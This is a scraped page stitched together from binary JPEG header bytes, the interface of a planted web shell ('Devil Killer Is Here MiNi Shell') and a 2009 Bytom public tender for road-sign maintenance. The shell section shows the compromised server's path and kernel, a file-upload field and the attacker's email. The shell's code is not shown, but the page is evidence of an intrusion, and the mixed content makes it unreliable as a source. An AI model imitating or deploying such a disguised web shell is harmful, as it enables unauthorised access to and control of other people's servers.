JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090303/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090303/48254-N-2009.html

<p class="kh_header"><b>Bytom: Utrzymanie oznakowania pionowego na terenie miasta Bytomia w 2009 roku</b><br>
<b>Numer ogłoszenia: 48254 - 2009; data zamieszczenia: 03.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bytom - Miejski Zarząd Dróg i Mostów , ul. Smolenia 35, 41-902 Bytom, woj. śląskie, tel. 032 3969700, faks 032 3969702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzdim.bytom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie oznakowania pionowego na terenie miasta Bytomia w 2009 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest utrzymanie oznakowania pionowego na terenie miasta Bytomia, obejmujące: dostawę elementów oznakowania, które są wyszczególnione w TABELI 1 (materiał) oraz wykonanie usług, które są wyszczególnione w TABELI 2 (usługi) formularza ofertowego. 

2. Zakres prac:

1) Montaż tarczy znaku o pow. < 0,3 m2 (kalkulacja na 1 szt.):
-	przykręcenie tarczy znaku na obejmach do słupka lub latarni

2) Montaż tarczy znaku o pow.> 0,3 m2 (kalkulacja na 1 szt.):
	-	przykręcenie tarczy znaku na obejmach do słupka lub latarni
	
3) Demontaż tarczy znaku (kalkulacja na 1 szt.):
	-	zdjęcie tarczy znaku na obejmach ze słupka lub latarni

4) Montaż słupka do znaku lub tablicy o średnicy 60 mm (kalkulacja na 1 szt.):
-	wykonanie dołu
-	ustawienie słupka do pionu
-	zasypanie gruzem i zalanie betonem
-	przywrócenie istniejącej nawierzchni zieleńca lub chodnika do stanu pierwotnego
-	odwóz ziemi, gruzu na średnią odległość 7 km
		
5) Montaż słupka do znaku lub tablicy o średnicy 76 mm lub żelbetowego o przekroju 12 x 12 (kalkulacja na 1 szt.);
-	wykonanie dołu
-	ustawienie słupka do pionu
-	zasypanie gruzem i zalanie betonem
-	przywrócenie istniejącej nawierzchni zieleńca lub chodnika do stanu pierwotnego
	-	odwóz ziemi, gruzu na średnią odległość 7 km

6) Demontaż słupka do znaku lub tablicy (kalkulacja na 1 szt.):
	-	odkopanie słupka
	-	wyjęcie słupka razem z fundamentem
	-	oddzielenie fundamentu od słupka 
-	zasypanie otworu po słupku piaskiem i zagęszczenie
-	przywrócenie nawierzchni zieleńca lub chodnika do stanu pierwotnego
	-	odwóz gruzu na średnią odległość 7 km
7)  Montaż tablicy lub drogowskazu  o pow.< 1,5 m2 (kalkulacja na 1 szt.):
	-	przykręcenie tablicy na obejmach do słupka 

8) Montaż tablicy lub drogowskazu  o pow.> 1,5 m2 (kalkulacja na 1 szt.):
	-	przykręcenie tablicy na obejmach do słupka / konstrukcji wsporczej

9) Demontaż tablicy, drogowskazu o pow.< 1,5 m2 (kalkulacja na 1 szt.):
	-	zdjęcie tablicy na obejmach ze słupka  konstrukcji wsporczej

10) Demontaż tablicy, drogowskazu o pow.> 1,5 m2  (kalkulacja na 1 szt.):
	-	zdjęcie tablicy na obejmach ze słupka  konstrukcji wsporczej

11) Montaż tablicy lub drogowskazu o pow.> 1, 5 m2  na konstrukcjach bramowych; na wiaduktach, mostach i kładkach nad jezdnią (z paneli lub w całości, kalkulacja na 1 szt.):
	-	przykręcenie tablicy  
	-	praca sprzętu ( pojazdu specjalistycznego)

12) Demontaż tablicy, drogowskazu o pow.> 1,5 m2 na konstrukcjach bramowych; na wiaduktach, mostach i kładkach nad jezdnią (z paneli lub w całości, kalkulacja na 1 szt.):
	-	zdjęcie tablicy
	-	praca sprzętu ( pojazdu specjalistycznego)

13) Prostowanie pogiętej tarczy znaku (kalkulacja na 1 szt.):
	-	zdjęcie tarczy znaku na obejmach ze słupka lub latarni
	-	prostowanie - gięcie zdeformowanej tarczy znaku 
-	przykręcenie tarczy znaku na obejmach do słupka lub latarni
	
14) Prostowanie pogiętego słupka do znaku (kalkulacja na 1 szt.):
	-	przywrócenie wygiętego słupka do pionu 

15) Betonowanie istniejącego słupka do znaku (kalkulacja na 1 szt.):
	-	wyjęcie słupka z otworu wraz z rozbiciem istn. fundamentu
	-	ustawienie słupka do pionu w otworze
	-	zasypanie gruzem i zalanie betonem

16) Montaż elementu progu zwalniającego (kalkulacja na 1 szt.):
	-	wykonanie - nawiercenie 4 otworów w nawierzchni bitumicznej
	-	osadzenie i przykręcenie elementu za pomocą śrub do osadzonych kołków rozporowych

17) Demontaż elementu progu zwalniającego (kalkulacja na 1 szt.):
	-	odkręcenie przytwierdzonego do jezdni elementu
	-	demontaż osadzonych w jezdni kołków rozporowych
	-	zalanie otworów asfaltem twardolanym D50/70

18) Montaż modułu azylu dla pieszych (kalkulacja na 1 szt.):
	-	wykonanie - nawiercenie 4 otworów w nawierzchni bitumicznej
	-	osadzenie i przykręcenie elementu za pomocą śrub do osadzonych kołków rozporowych

19) Demontaż modułu azylu dla pieszych (kalkulacja na 1 szt.):
	-	odkręcenie przytwierdzonego do jezdni elementu
	-	demontaż osadzonych w jezdni kołków rozporowych
	-	zalanie otworów asfaltem lanym

20) Montaż punktowego elementu odblaskowego tzw. kocie oczko (kalkulacja na 1 szt.):
	-	oczyszczenie jezdni z zanieczyszczeń
	-	montaż elementu - klejenie z zastosowaniem kleju termoplastycznego



21) Montaż wysięgnika na ścianie budynku (kalkulacja na 1 szt.):
	-	wykonanie otworów w murze
	-	osadzenie i przykręcenie elementu za pomocą śrub do osadzonych kołków rozporowych

22) Demontaż wysięgnika na ścianie budynku (kalkulacja na 1 szt.):
	-	odkręcenie przytwierdzonego do muru wysięgnika
	-	demontaż osadzonych w murze kołków rozporowych
	-	zalanie otworów w murze betonem 

23) Montaż słupka przeszkodowego U-5a (kalkulacja na 1 szt.):
	-	osadzenie elementu na wcześniej ustawionym słupku 

24) Montaż lustra drogowego (kalkulacja na 1 szt.):
	-	przymocowanie lustra na obejmach do słupka

25) Przyklejenie lica znaku (kalkulacja na 1 m2.):
-	Oczyszczenie lica znaku z zanieczyszczeń
-	Przyklejenie nowego elementu (folii)

3. Wymogi dla materiałów :

a) znaki drogowe typu A,B,C,D,E,F,G,T,U, progi zwalniające, azyle dla pieszych, lustra drogowe i elementy punktowe odblaskowe ( kocie oczka ) - powinny posiadać certyfikat wydany przez Instytut Badawczy Dróg i Mostów lub inne upoważnione jednostki,

b) znaki powinny być :
- wykonane z folii typu II (II generacji) dla znaków o symbolach: A-7, B-2, B-20, D-6, D-6a, 
  D-6b z grupy średnich,
 - wykonane z folii typu I (I generacji) dla pozostałych znaków i tablic,
  - wykonane z blachy ocynkowanej,
    - podwójnie zaginane na całym obwodzie,
     - pomalowane z zastosowaniem farby proszkowej.

c) słupki do znaków powinny być wykonane z rur ocynkowanych o średnicach: 60 mm, 76 mm, o grubości ścianki od 3,2mm - 4,0 mm ; winny posiadać kotwy uniemożliwiające obrót elementu ( po jego osadzeniu ) w gruncie wokół jego osi.
Długości należy dostosować w zależności od konfiguracji mocowanego na nich oznakowania z zachowaniem wymaganych skrajni pionowych określonych w Rozporządzeniu Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz.U. z 2003r. Nr 220, poz. 2181z późn. zm.).

 Rodzaj słupków:
- proste,
- gięte (dla montażu oznakowania nad występującymi w terenie przeszkodami uniemożliwiającymi montaż słupków w pionie).

 Długość wszystkich słupków liczona będzie indywidualnie w metrach.

d) punktowy element odblaskowy (kocie oczko) powinien odpowiadać poniższym parametrom:
- stan: nowy (nieużywany),
- budowa: profilowana podstawa, wykonana z poliwęglanu wzmocnionego włóknem szklanym oraz jednego lub dwóch pryzmatycznych elementów odblaskowych w postaci folii odblaskowej typu 3, osłoniętych płytką z tworzywa sztucznego odpornego na ścieranie,
- korpus odblasku najezdniowego: biały, 
- odbłyśniki: biały lub czerwony,
- kształt: płytka o przekroju w przybliżeniu trapezowym,
- długość: od 80 mm do 120 mm,
- szerokość: od 80 mm do 120 mm,
- wysokość: od 15 mm do 20 mm,
- współczynnik odbicia współdrożnego > 300 mcd/lx,
- sposób montażu: na klej polimeroasfaltowy /termoplastyczny.

e) pod pojęciem wysięgnika rozumie się konstrukcję wsporczą do znaków z grupy średnich lub małych, wykonaną z rur ocynkowanych lub kątowników, względnie innych kształtowników. Element pionowy, na którym montowany będzie znak powinien wynosić 1,0 m, natomiast ramię wysięgnika łączące element pionowy z elewacją budynku winno wynosić 0,5 m. Ramię powinno być zamontowane za pomocą śrub i kołków rozporowych. 
      
 f) znaki typu E, F, G, T, U i inne tablice (np. tablice typu D) rozliczane będą w powierzchni podanej w metrach kwadratowych.

4. Wykonawca winien zaproponować okres gwarancji na materiały zgodny z gwarancją producenta, ale nie krótszy niż 36 miesięcy, co najmniej 36 miesięczny okres gwarancji na wykonane usługi oraz co najmniej 36 miesięczny okres rękojmi na wykonane usługi i materiały służące realizacji zamówienia.
Dla znaków ustawionych czasowo w związku z organizacją na terenie miasta imprez, gwarancja obowiązywać będzie do czasu ich demontażu w terenie.

5. Zamawiający dopuszcza montaż znaków drogowych z odzysku, które odbierane będą z zasobów magazynowych Zamawiającego (Bytom, ul. Hajdy 1a).

6. Termin wykonania zamówienia: od dnia zawarcia umowy do dnia 31.12.2009r..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.90-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do niniejszego przetargu winien wnieść wadium w następującej wysokości: 6.000,00 zł ( sześć tysięcy złotych ).

Wadium może być wniesione w jednej lub kilku formach, o których mowa w art. 45 ust. 6 ustawy.
W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego - tj. Gmina Bytom - Miejski Zarząd Dróg i Mostów, 41-902 Bytom ul. Smolenia 35), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,
b) określenie wierzytelności, która ma być zabezpieczona gwarancją (nazwa i numer postępowania),
c) kwotę gwarancji,
d) okres ważności gwarancji (nie może być krótszy niż okres związania ofertą),
e) oświadczenie gwaranta, w którym zobowiązuje się on nieodwołalnie do bezwarunkowej zapłaty kwoty wadium na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż zaszła jedna z przesłanek wymienionych w art. 46 ust. 4a i/lub ust. 5 ustawy.
	
Powyższe zapisy stosuje się również do poręczeń wskazanych w art. 45 ust 6 pkt 2 i 5 ustawy.

Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek Zamawiającego: Getinbank O/Bytom: 43 1560 1049 0000 9030 0026 9731 z podaniem nazwy niniejszego zamówienia oraz numeru zadania, którego wadium dotyczy.  Do oferty należy dołączyć kopię polecenia przelewu.
Wadium wnoszone w innych dopuszczalnych formach należy w oryginale złożyć w siedzibie Zamawiającego - 41-902 Bytom, ul. Smolenia 35 (II piętro - pok. Nr 14 - Dział Zamówień Publicznych), a kopię wadium dołączyć do oferty.  

Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi wpływ środków na rachunek Zamawiającego i uznanie środków na tym rachunku przed upływem terminu składania ofert.
Zamawiający zwraca wadium  w przypadkach wymienionych w art. 46 ustawy. Wadium wniesione inaczej niż w pieniądzu (oryginał dokumentu wadialnego) Zamawiający wydaje (przesyła) Wykonawcom za potwierdzeniem odbioru.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych ( j.t. - Dz. U. z 2007r., Nr 223, poz. 1655 z późń. zm.) tj.:
a. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 
c. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

2. Warunki szczegółowe stawiane wykonawcom przystępującym do przetargu:
a/ Wykonawca winien wykazać, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje usługi polegające na konserwacji i naprawach (tj. montażu urządzeń zabezpieczenia ruchu) oznakowania pionowego na drogach o wartości co najmniej 150.000,00 zł brutto oraz przedstawić dokumenty potwierdzające należyte wykonanie tych usług.

3. Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. oświadczenie potwierdzające, że wykonawca spełnia warunki określone w art. 22 ust. 1 pkt 1-3 ustawy Prawo zamówień publicznych (załącznik nr 1 do SIWZ),
2. oświadczenie potwierdzające, że wykonawca spełnia warunki określone w art. 22 ust. 1 pkt 4 ustawy Prawo zamówień publicznych (załącznik nr 2 do SIWZ),
3. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - oryginał lub kopia poświadczona za zgodność z oryginałem przez wykonawcę lub upoważnioną przez niego osobę/osoby,
4. aktualne - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert - zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków i opłat lub, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - oryginał lub kopia poświadczona za zgodność z oryginałem przez wykonawcę lub upoważnioną przez niego osobę,
5. aktualne - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert - zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłaceniem składek na ubezpieczenie zdrowotne i społeczne lub, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - oryginał lub kopia poświadczona za zgodność z oryginałem przez wykonawcę lub upoważnioną przez niego osobę,
6. wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie (zgodnie z warunkiem określonym w cz. IV pkt 2 lit. a SIWZ) - oryginał lub kopia dokumentu potwierdzającego należyte wykonanie usługi, 
oraz - jeżeli dotyczy (tj. jeżeli Wykonawca przy realizacji zamówienia będzie wykorzystywał osoby zdolne do wykonywania zamówienia i/lub potencjał techniczny innych podmiotów):
7. pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i/lub osób zdolnych do wykonania zamówienia.

Wykonawca winien złożyć dokumenty we wskazanej kolejności.	
UWAGA NR 1: Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa powyżej stosuje się odpowiednio przepisy § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2006r., Nr 87, poz. 605 z późn. zm.)
UWAGA NR 2: Oświadczenie i dokumenty winny potwierdzać spełnienie przez Wykonawcę warunków udziału w postępowaniu nie później niż w dniu, w którym upłynął termin składania ofert. Powyższe stosuje się odpowiednio do ewentualnych pełnomocnictw..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mzdim.bytom.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Dróg i Mostów
ul. Smolenia 35 (II piętro, Dział Zamówień Publicznych MZDiM, pok. nr 14)
41-902 Bytom.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2009 godzina 10:00, miejsce: Miejski Zarząd Dróg i Mostów
ul. Smolenia 35 (II piętro, Dział Zamówień Publicznych MZDiM, pok. nr 14)
41-902 Bytom.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com